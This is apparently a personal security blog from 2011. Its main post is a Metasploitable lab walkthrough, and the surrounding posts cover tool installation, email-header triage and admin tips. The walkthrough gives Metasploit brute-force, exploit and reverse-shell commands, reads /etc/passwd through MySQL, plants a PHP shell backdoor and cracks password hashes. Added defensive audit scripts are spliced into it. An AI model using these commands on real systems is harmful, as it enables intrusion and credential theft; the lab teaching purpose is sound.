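    php_script, php_client = (php[0].split(" for ", 1) + [None])[:2] if php else (None, None)
    claimed = re.search(r"from=([\w.-]+)", auth)
    dkim = re.search(r"dkim=(\w+)", auth)
    return {
        # Explicit header first, else the peer IP our own MTA recorded.
        "originating_ip": orig[0].strip("[]") if orig else (hops[0]["ip"] if hops else None),
        "sender_host": (hops[0]["ehlo"] or hops[0]["helo"]) if hops else None,
        "spf": spf[0].split()[0] if spf else None,
        "dkim": dkim.group(1) if dkim else None,
        "claimed_from_domain": claimed.group(1) if claimed else None,
        "php_script": php_script,    # web-form mailer that injected the message
        "php_client_ip": php_client,  # address that called that script
        "hops": hops,
    }


def indicators(summary):
    """Plain-language red flags derived from triage()'s summary."""
    flags = []
    if summary["spf"] in (None, "none", "fail", "softfail"):
        flags.append("SPF result is %r for the sending host" % summary["spf"])
    claimed, host = summary["claimed_from_domain"], summary["sender_host"]
    if claimed and host and not host.endswith(claimed):
        flags.append("From claims %s but the message came via %s" % (claimed, host))
    if summary["php_script"]:
        flags.append("injected by web script %s, called from %s"
                     % (summary["php_script"], summary["php_client_ip"]))
    return flags


if __name__ == "__main__":
    for flag in indicators(triage(SAMPLE_HEADERS)):
        print(flag)
```

The X-PHP-Script client address (41.184.112.91 here) is the party that drove the compromised web host, which is the lead to chase; the originating IP only tells you which hijacked server relayed the message.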

      9/06/2011

      IEEETrans on Mac OS X with texlive

      While compiling a journal paper, I got the following error message "I couldn't open style file IEEEtran.bst"

      The IEEETrans TeX distribution can be manullay installed by using the packages from CTAN [1] or  IEEE [2]. However since I use macports, I just had to;
      1. sudo port install texlive-publishers

      References:
      1. http://www.ctan.org/tex-archive/macros/latex/contrib/IEEEtran/
      2. http://www.ieee.org/portal/cms_docs/pubs/transactions

      9/03/2011

      Metasploitable walkthrough

      Note: this post will be updated when I have more time. This never happened! The Metasploitable2 walk-through is also available at http://nkush.blogspot.com.au/2015/02/metasploitable2-walk-through.html.

      I am sure there are plenty of Metasploitable walkthroughs available, but I thought I'd chuck one up here anyway... Firstly download and unzip the Metasploitable VMware image. I use VirtualBox, and it works just as well. I ran my Metasploitable image and BackTrack in host-only mode, so I had an isolated network to play in without damaging anything else.

      For some of the brute force attacks you will need a wordlist of potential usernames and passwords. There are several free wordlists available. Kevin's Wordlist Page [2] is quite good. The generated wordlist should be sufficient for most attacks, save for ones where rigorous password complexity is enforced.

      Note: Since this is just a demonstration/walk-through, the attempts herein to circumvent the security of the host have not been throttled down to prevent detection; in fact the scans and exploits run may be considered extremely noisy.

      Discovery
      1. Find the IP address of the metasploitable host 
        • nmap -sn -n -T1 192.168.56.0/24 
      2. In this case the host IP was 192.168.56.101
      3. Scan the metasploitable host to find the OS and services running on it 
        • nmap -n -v -A -O -T1 -sS -sV 192.168.56.101 
        • The following services were identified; 21 running ProFTPD 1.3.1, 22 running OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0), 23 running Linux telnetd, 25 running Postfix smtpd, 53 running ISC BIND 9.4.2, 80 running Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.10 with Suhosin-Patch), 139 running Samba smbd 3.X (workgroup: WORKGROUP), 445 running Samba smbd 3.X (workgroup: WORKGROUP), 3306 running MySQL 5.0.51a-3ubuntu5, 5432 running PostgreSQL DB 8.3.0 - 8.3.7, 8009 running Apache Jserv (Protocol v1.3), 8180 running Apache Tomcat/Coyote JSP engine 1.1 on Host:  metasploitable.localdomain; OSs: Unix, Linux
      4. Search the exploit DB to see if any exploits exist, and run the metasploit exploit. I have discussed these in detail below. In the majority of cases the exploits already exist in metasploit and it is just a matter of selecting the correct one and specifying the correct options and parameters.
      MySQL
      1. The version according to the nmap scan was MySQL 5.0.51a-3ubuntu5
      2. http://www.exploit-db.com/search/?action=search&filter_page=1&filter_description=mysql
      3. Brute force the login
        • search mysql
        • use auxiliary/scanner/mysql/mysql_login
        • show options
        • set THREADS 1000 # adding the brute in brute force
        • set RHOST 192.168.56.101
        • set USERPASS_FILE /opt/msf3/demo-wordlist.txt
        • set STOP_ON_SUCCESS true
        • run
      4. [+] 192.168.56.101:3306 - SUCCESSFUL LOGIN 'root' : 'root'
      5. Install a mysql client locally and use the credentials to connect to the remote server and get a dump of the DB or run SQL queries, or use another metasploit module to read the contents of the /etc/passwd file to identify accounts that have shell access
        • back
        • use auxiliary/admin/mysql/mysql_sql
        • show options
        • set USERNAME root
        • set PASSWORD root
        • set RHOST 192.168.56.101
        • set SQL select load_file(\'/etc/passwd\')
        • run
      6. You should now have the contents of the /etc/passwd file
      TikiWiki
      Using the credentials found using the brute force method above, we can connect using the mysql client, e.g. mysql -u root -p -h 192.168.56.101
      1. Check the databases installed
        • show databases;
      2. Returns the names of the databases, information_schema, mysql, tikiwiki, and tikiwiki195. Guessing from the name, it appears to be a database for a wiki application. A quick google search (http://info.tiki.org/Tiki+Wiki+CMS+Groupware) confirms this. This too is vulnerable and metasploit exploits exist.
        • back
        • use exploit/unix/webapp/tikiwiki_graph_formula_exec
        • show options
        • set RHOST 192.168.56.101
        • set PAYLOAD php/meterpreter/reverse_tcp
        • set LHOST 192.168.56.1
        • exploit
      3. This returns the username and password used with the wiki CMS and a meterpreter session. The meterpreter console is very powerful and extremely useful in further analysis of the host. We may come back to the meterpreter console.
      4. The good thing about wikis and CMSs in general is the ability to load files onto the server. Unfortunately there are two tikiwiki databases in use. Fortunately both have the same details in their users_users table, i.e. a username and password of admin and admin respectively.
      5. There is a requirement for uploading files to the compromised machine for easier access later, i.e. a back door, refer below [3-4]. We can test the upload of a backup by creating a simple file e.g. phpinfo.php with phpinfo(); in it, and then uploading it via the backup upload and then navigating to "http://192.168.56.101/tikiwiki/backups/phpinfo.php". If you see the PHP info page, then the uploads work great and backup PHP files are interpreted by the server.
      6. Now download a PHP shell and upload it for a shell backdoor. Here's a list of potential PHP shells;
      Mysql Users

      1. Again using the MySQL credentials, we can query the user table in the mysql database using the mysql client.
        • mysql -u root -proot -h 192.168.56.101
        • use mysql
        • SELECT host, user, password FROM user;
      2. We are presented with additional users such as debian-sys-maint and the 41-byte hash values (*E07F0A7CCC0044345116513C989F45663C1F8347) of their passwords.
      3. I tried running John the Ripper on this to see if I could crack the password, but it was taking too long so I gave up. However, you may have better luck, especially with rainbow tables, etc.
        • The username and password hash were saved in a file, e.g. mysql.txt, in the following format: username:hash, i.e. debian-sys-maint:*E07F0A7CCC0044345116513C989F45663C1F8347
        • john --format=mysql-sha1 mysql.txt
      4. We could also have copied the hash from the root account to the other accounts, as we already know the root password, but the idea is to remain undetected.
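As an added example (not part of this walkthrough), the Python script below audits rows in the shape of the `SELECT host, user, password FROM user;` output above. It recomputes the 41-byte mysql_native_password hash the walkthrough shows in order to flag accounts whose password is empty, equals the username or is a common default, and root accounts reachable from any host. The sample rows are constructed (only the debian-sys-maint hash is the value quoted above) and the default-password list is an assumption.

```python
"""Audit a mysql.user dump for the weaknesses shown above (added example, not part of the walkthrough)."""
import hashlib


def mysql_native_hash(password):
    """MySQL 4.1+ password hash: '*' followed by hex(SHA1(SHA1(password))), 41 bytes."""
    inner = hashlib.sha1(password.encode("utf-8")).digest()
    return "*" + hashlib.sha1(inner).hexdigest().upper()


# Constructed rows in the shape of `SELECT host, user, password FROM user;`.
# The debian-sys-maint hash is the value quoted in the walkthrough; the rest are made up.
SAMPLE_USERS = [
    ("%",         "root",             mysql_native_hash("root")),
    ("localhost", "debian-sys-maint", "*E07F0A7CCC0044345116513C989F45663C1F8347"),
    ("localhost", "backup",           ""),
    ("localhost", "app",              mysql_native_hash("Corr3ct-H0rse-Battery!")),
]

# Assumed list of vendor/default passwords worth checking against every account.
COMMON_DEFAULTS = ("root", "admin", "password", "mysql")


def audit_mysql_users(rows, defaults=COMMON_DEFAULTS):
    """Return (user, host, finding) tuples for empty passwords, passwords equal to the
    username or a common default, and root accounts reachable from any host ('%')."""
    findings = []
    for host, user, pw_hash in rows:
        if not pw_hash:
            findings.append((user, host, "empty password"))
        elif pw_hash == mysql_native_hash(user):
            findings.append((user, host, "password equals username"))
        else:
            for guess in defaults:
                if pw_hash == mysql_native_hash(guess):
                    findings.append((user, host, f"common default password '{guess}'"))
                    break
        if user == "root" and host in ("%", ""):
            findings.append((user, host, "root may connect from any host"))
    return findings


if __name__ == "__main__":
    for user, host, finding in audit_mysql_users(SAMPLE_USERS):
        print(f"{user}@{host}: {finding}")
```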

      Apache
      Port 80 has a web server running; we can connect using a browser to confirm and get an "It works!" page. To confirm the structure of the web directories we can use a fuzzer such as OWASP's DirBuster.
      1. The initial scans should confirm the tikiwiki CMS in its directory structure.

      SSH
      Based on the contents of the /etc/passwd file, we can now tweak our usernames file before trying to brute force an SSH connection.
      1. Brute force the SSH login. Unlike the other attempts, we don't want to stop at the first success but collect all working SSH logins. Note: for the walkthrough example below I have just used the same file, but you should specify a separate user file based on the contents of /etc/passwd, and a separate password file, to speed things up.
        • back
        • use auxiliary/scanner/ssh/ssh_login
        • show options
        • set RHOSTS 192.168.56.101
        • set THREADS 1000
        • set USERPASS_FILE /opt/msf3/demo-wordlist.txt
        • set STOP_ON_SUCCESS false
        • run
      2. [+] 192.168.56.101:22 SSH - [23/30] - Success: 'user':'user' 'uid=1001(user) gid=1001(user) groups=1001(user) Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux '
      3. [+] 192.168.56.101:22 SSH - [28/30] - Success: 'msfadmin':'msfadmin' 'uid=1000(msfadmin) gid=1000(msfadmin) groups=4(adm),20(dialout),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),107(fuse),111(lpadmin),112(admin),119(sambashare),1000(msfadmin) Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux '
      4. [+] 192.168.56.101:22 SSH - [29/30] - Success: 'service':'service' 'uid=1002(service) gid=1002(service) groups=1002(service) Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux '
      5. [+] 192.168.56.101:22 SSH - [30/30] - Success: 'postgres':'postgres' 'uid=108(postgres) gid=117(postgres) groups=114(ssl-cert),117(postgres) Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux '
      6. Now we have shell access via a number of logins.
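The successful logins above are exactly what the target's own auth log records. As an added example (not part of the walkthrough), the Python script below parses constructed sshd log lines in the OpenSSH message format and flags any source that cycles through many usernames or opens several different accounts, which is what a STOP_ON_SUCCESS false run looks like from the server's side. The thresholds and the sample hostname and addresses are assumptions.

```python
"""Flag SSH password guessing in sshd auth.log lines (added example, not part of the walkthrough)."""
import re
from collections import defaultdict

# OpenSSH message formats; the syslog prefix is left in place and skipped over by search().
FAILED = re.compile(r"Failed password for (?:invalid user )?(\S+) from (\S+) port \d+")
ACCEPTED = re.compile(r"Accepted password for (\S+) from (\S+) port \d+")

# Constructed sample: one source cycles through accounts and opens four of them in a row.
SAMPLE_LOG = """\
Sep  1 10:00:01 metasploitable sshd[2001]: Failed password for invalid user admin from 192.168.56.1 port 40001 ssh2
Sep  1 10:00:01 metasploitable sshd[2002]: Failed password for root from 192.168.56.1 port 40002 ssh2
Sep  1 10:00:02 metasploitable sshd[2003]: Failed password for invalid user test from 192.168.56.1 port 40003 ssh2
Sep  1 10:00:02 metasploitable sshd[2004]: Accepted password for user from 192.168.56.1 port 40004 ssh2
Sep  1 10:00:03 metasploitable sshd[2005]: Accepted password for msfadmin from 192.168.56.1 port 40005 ssh2
Sep  1 10:00:03 metasploitable sshd[2006]: Accepted password for service from 192.168.56.1 port 40006 ssh2
Sep  1 10:00:04 metasploitable sshd[2007]: Accepted password for postgres from 192.168.56.1 port 40007 ssh2
Sep  1 10:05:00 metasploitable sshd[2010]: Accepted password for msfadmin from 192.168.56.50 port 51000 ssh2
"""

def summarise_ssh_logins(log_text):
    """Per source IP: failed count, set of usernames tried, accepted users in log order."""
    stats = defaultdict(lambda: {"failed": 0, "users_tried": set(), "accepted": []})
    for line in log_text.splitlines():
        m = FAILED.search(line)
        if m:
            user, ip = m.groups()
            stats[ip]["failed"] += 1
            stats[ip]["users_tried"].add(user)
            continue
        m = ACCEPTED.search(line)
        if m:
            user, ip = m.groups()
            stats[ip]["users_tried"].add(user)
            stats[ip]["accepted"].append(user)
    return stats

def suspicious_sources(stats, min_users=3, min_accounts=2):
    """A source is flagged when it tries many distinct usernames, or logs in to several
    different accounts, which is what STOP_ON_SUCCESS false looks like on the server."""
    flagged = []
    for ip, s in stats.items():
        if len(s["users_tried"]) >= min_users or len(set(s["accepted"])) >= min_accounts:
            flagged.append((ip, sorted(set(s["accepted"]))))
    return sorted(flagged)

if __name__ == "__main__":
    for ip, accounts in suspicious_sources(summarise_ssh_logins(SAMPLE_LOG)):
        print(f"{ip}: password guessing, accounts opened: {', '.join(accounts)}")
```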

      Tomcat
      1. Brute force the management login
        • back
        • use auxiliary/scanner/http/tomcat_mgr_login
        • show options
        • set RHOSTS 192.168.56.101
        • set RPORT 8180
        • exploit
      2. [+] http://192.168.56.101:8180/manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] successful login 'tomcat' : 'tomcat'
      3. Get a shell by exploiting the host, using the weak password found by the scanner to deploy a payload
        • back
        • use exploit/multi/http/tomcat_mgr_deploy
        • show options
        • set USERNAME tomcat
        • set PASSWORD tomcat
        • set RPORT 8180
        • set PAYLOAD linux/x86/shell_reverse_tcp
        • set STOP_ON_SUCCESS true
        • exploit
      4. Should have shell now!
      DistCC
      This was discovered on a subsequent port scan using different parameters. I am not quite sure what it is, but there is an exploit in Metasploit, and the Wikipedia documentation indicates it is some sort of distributed compiler for C and C++.

      1. The number of payloads are limited for this exploit, but still allow remote shell access
        • back
        • search distcc
        • use exploit/unix/misc/distcc_exec
        • show options
        • set RHOST 192.168.56.101
        • set PAYLOAD cmd/unix/reverse
        • set LHOST 192.168.56.1
        • exploit
        Files
        Here's a list of interesting files I found on the system, I hope to add more detailed descriptions and discuss their contents once I have the opportunity to investigate further.
        1. /root/reset_logs.sh
        Requirements:
        1. Metasploit (I used Backtrack5)
        2. nmap
        3. Metasploitable
        References:
        1. http://www.exploit-db.com
        2. http://wordlist.sourceforge.net/
        3. http://www.gnucitizen.org/blog/reverse-shell-with-bash/
        4. http://www.plenz.com/reverseshell

        9/02/2011

        Metasploit presentation for CTF

        We had a CTF training at the labs today, where I tried to present a brief introduction to Metasploit. I seriously doubt I did the tool any justice, but a colleague has requested a copy of the slides as a PDF document. I have uploaded the slides to http://www.kush.com.fj/resources/metasploit-presentation.pdf. The presentation was mostly a demo using Metasploitable. Perhaps in future there may be an opportunity to do a complete walkthrough of the Metasploitable image posted here. I started work on a Metasploit walkthrough; it's still incomplete but it's a start. You can find the walkthrough here: http://nkush.blogspot.com/2011/09/metasploitable-walkthrough.html


        Installing Metasploit 4.0.0 on Apple Mac OS X 10.6.8

        The installation instructions are quite well documented on the Rapid7 documentation site [1], but in my usual style of duplicating data on the Internet, I have documented my efforts below. The key requirements of Xcode and MacPorts were already addressed on this particular machine :)

        Note: It's important to ensure that any anti-virus (AV) software is temporarily disabled and appropriate scanning exceptions added; this is to prevent the AV from quarantining the exploits and payloads that come with Metasploit.

        1. sudo bash
        2. port selfupdate
        3. port install ruby19 +nosuffix
        4. echo $PATH # Ensure that /opt/local/bin appears before /usr/bin, else edit ~/.bash_profile file and source it; ". ~/.bash_profile" or "source ~/.bash_profile"
        5. port install mysql5-server
        6. gem install mysql
        7. cd /opt
        8. wget http://updates.metasploit.com/data/releases/framework-4.0.0.tar.bz2
        9. bunzip2 framework-4.0.0.tar.bz2
        10. tar xvf framework-4.0.0.tar
        11. cd msf3
        12. svn update
        13. ln -s /opt/msf3/msf* /opt/local/bin/

        References:
        1. https://community.rapid7.com/docs/DOC-1037
        2. http://www.metasploit.com/download/

        8/27/2011

        WikiCFP

        WikiCFP is a useful wiki site that collates CFPs (calls for papers).

        However, I am a bit disappointed that it does not automatically track the same event into the following year, e.g. once a conference is over and the dates for the following year have been announced, it should link to the following year's conference details instead of requiring a manual search.

        There is also an iPhone application called WikiCFP that links to the site. Although functional, the application is not very intuitive; for the relatively high price of the application I was expecting more from it, e.g. calendar integration, etc.

        Runtime on notebooks

        I got an Apple MacBook Pro towards the start of the year. The issue was that closing the lid only puts the machine in standby mode, which still consumes power, so I wasn't getting as long a runtime as I would on my old HP nx6120 with a travel battery.

        A Google search led me to Todd Huss's page [2]. This identified the pmset command [1] as being quite useful. I followed the instructions and now have the MacBook hibernating when I close the lid. Since then I have been asked by a number of colleagues about this, so I thought I had better document it here.

        I rebuilt the old HP nx6120 to run Ubuntu 10.04 LTS. Again I noticed that I wasn't getting a reasonable runtime: instead of the usual 8-10 hrs, I only got around 3-4 hrs. A discussion with a colleague led me to Linux Laptop Tools. Again some "Googling" led to the Ubuntu power management page [3], which seemed to increase the runtime.

        References

        1. http://en.wikipedia.org/wiki/Pmset
        2. http://gabrito.com/post/hibernate-with-the-macbook-pro
        3. https://wiki.ubuntu.com/PowerManagement

        8/26/2011

        securingSCADA.info

        The securingSCADA.info site was launched earlier this year; it now boasts a wiki that is slowly being populated with resource information on penetration testing, security compliance, etc.

        It's targeted towards individuals and organisations from academia and industry working on SCADA, smart grid and related security areas. Of course everyone is welcome to sign up and contribute, as the site is dedicated to providing security through collaboration.

        The site is located at http://www.securingscada.info

        8/24/2011

        Installing joomscan on Ubuntu 10.04 LTS

        The OWASP Joomla! Security Scanner "detects file inclusion, sql injection, command execution vulnerabilities of a target Joomla! web site." However, it appears to have been neglected, although an update is promised soon.

        1. cd /opt
        2. sudo apt-get install -y libtest-www-mechanize-perl
        3. svn co https://joomscan.svn.sourceforge.net/svnroot/joomscan joomscan
        4. cd joomscan
        5. chmod 755 trunk/joomscan.pl
        6. trunk/joomscan.pl update

        8/23/2011

        Installing Metasploit 4.0.0 on Ubuntu 10.04 LTS

        Installing Metasploit is quite easy. I have documented the installation instructions that I used below; however, it's just as simple to follow the more comprehensive instructions from the Rapid7/Metasploit site [1] (https://community.rapid7.com/docs/DOC-1296).



        1. sudo apt-get install -y ruby libopenssl-ruby libyaml-ruby libdl-ruby libiconv-ruby libreadline-ruby irb ri rubygems
        2. wget http://updates.metasploit.com/data/releases/framework-4.0.0.tar.bz2
        3. sudo mkdir /opt/metasploit4
        4. sudo bunzip2 framework-4.0.0.tar.bz2
        5. sudo tar xvf framework-4.0.0.tar
        6. sudo mv msf3 /opt/metasploit4
        7. sudo chown -R root:root /opt/metasploit4/msf3
        8. sudo ln -s /opt/metasploit4/msf3/msf* /usr/local/bin
        9. cd /opt/metasploit4/msf3
        10. sudo svn update
        11. sudo crontab -e -u root # Enter "1 * * * * /usr/bin/svn update /opt/metasploit4/msf3/ >> /var/log/msf3update.log 2>&1" (five time fields: one minute past every hour)
        12. sudo apt-get install -y mysql-server
        13. sudo apt-get install -y rubygems libmysqlclient-dev
        14. sudo apt-get install -y ruby-dev
        15. sudo gem install mysql


        References:
        1. https://community.rapid7.com/docs/DOC-1296


        7/09/2011

        Ubuntu apt-get error

        When performing an "apt-get update" I got the following error

        Reading package lists... Error!
        E: Dynamic MMap ran out of room. Please increase the size of APT::Cache-Limit. Current value: 25165824. (man 5 apt.conf)
        E: Error occurred while processing xxx
        E: Problem with MergeList /var/lib/apt/lists/xxx
        W: Unable to munmap
        E: The package lists or status file could not be parsed or opened.

        I am unsure why this is happening, but suspect it has something to do with the cache size allocated for the repositories. A quick Google search revealed a Debian bug [1] that helped.

        echo 'APT::Cache-Limit "125829120";' | sudo tee /etc/apt/apt.conf.d/30cache # sudo must apply to the write into /etc, not just to echo

        This seems to have fixed the problem; a quick sudo apt-get update and sudo apt-get upgrade had me happily hacking away again.

        References:
        1. https://bugs.launchpad.net/debian/+source/apt/+bug/24626

        4/03/2011

        Ramblings...

        I cannot speak for other students, but I find feedback and constructive criticism very useful to my education and overall performance. Unfortunately I am finding the latter increasingly absent from the current academic environment, especially when it comes to submitting official forms to QUT. It seems like a black hole at times.

        Oh well, “Such is life”. I seem to be quoting this a lot recently. Perhaps as a subconscious resignation to my lot in life. Just realised I have the same initials as Ned Kelly, but unfortunately his proper name was Edward Kelly, so I guess not...

        3/06/2011

        Cisco 857W Router - Upgrade ADSL Firmware

        To upgrade the ADSL firmware you need to get the latest .bin firmware file from Cisco. You will need a CCO and a valid contract to download the file.

        Once you have this, copy the file to flash using a TFTP server. Then rename the file to remove the version number, make a backup of the configuration file just in case, and reboot the router. The reboot should force the new firmware to be loaded. Once rebooted, verify the version of the firmware.

        Check the version of the firmware currently running
        show dsl interface ATM 0

        Init FW:         init_xxx-x.x.xxx.bin
        Operation FW:    xxx-x.x.x.bin
        FW Source:       xxxxxxxx
        FW Version:      x.x.x



        Check the amount of space available on flash for the firmware, ensure that the bytes free is greater than the size of the firmware .bin file
        show flash

        19353600 bytes total (5369856 bytes free)

        Copy the firmware .bin file to flash
        copy tftp://xxx.xxx.xxx.xxx/adsl_alc_20190.x.x.x.bin

        Rename the file on flash to adsl_alc_20190.bin
        rename flash:adsl_alc_20190.x.x.x.bin adsl_alc_20190.bin

        Reboot the router
        reload

        2/11/2011

        kush.id.au

        Got the kush.id.au domain and parked it over the kush.com.fj domain, so all subdomains and e-mail addresses should resolve for the id.au domain. I need to make some changes to the website to allow for this. I also need to upload some new Python scripts that I wrote.